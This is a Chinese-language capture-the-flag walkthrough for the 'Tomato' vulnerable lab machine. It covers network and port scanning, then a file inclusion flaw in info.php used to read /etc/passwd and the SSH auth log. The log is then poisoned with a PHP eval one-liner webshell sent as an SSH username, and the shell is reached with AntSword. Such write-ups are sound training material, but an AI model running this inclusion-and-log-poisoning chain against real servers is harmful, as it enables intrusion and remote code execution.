Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
우 유1 分钟前
Linux从入门到入门
linux·运维·服务器
alonetown19 分钟前
IEC 62351 第十一部分详情
网络·iec62351·iec62351-10
神经毒素20 分钟前
WEB安全--WAF的绕过思路
安全·web安全
qq_27866728620 分钟前
ros中相机话题在web页面上的显示,尝试js解析sensor_msgs/Image数据
前端·javascript·ros
烛阴27 分钟前
JavaScript并发控制:从Promise到队列系统
前端·javascript
宇宙超级勇猛无敌暴龙战神28 分钟前
服务器如何从http升级到https(nginx)
服务器·http·https
zhangxingchao36 分钟前
关于《黑马鸿蒙5.0零基础入门》课程的总结
前端
zhangxingchao37 分钟前
Flutter的Widget世界
前端
Tom Boom1 小时前
2. 如何理解互联网七层模型?深度解析。
网络·自动化测试·测试开发·测试用例·自动化测试框架开发
zzc9211 小时前
不同程度多径效应影响下的无线通信网络电磁信号仿真数据生成程序
网络·matlab·数据集·无线信道·无线通信网络拓扑推理·多径效应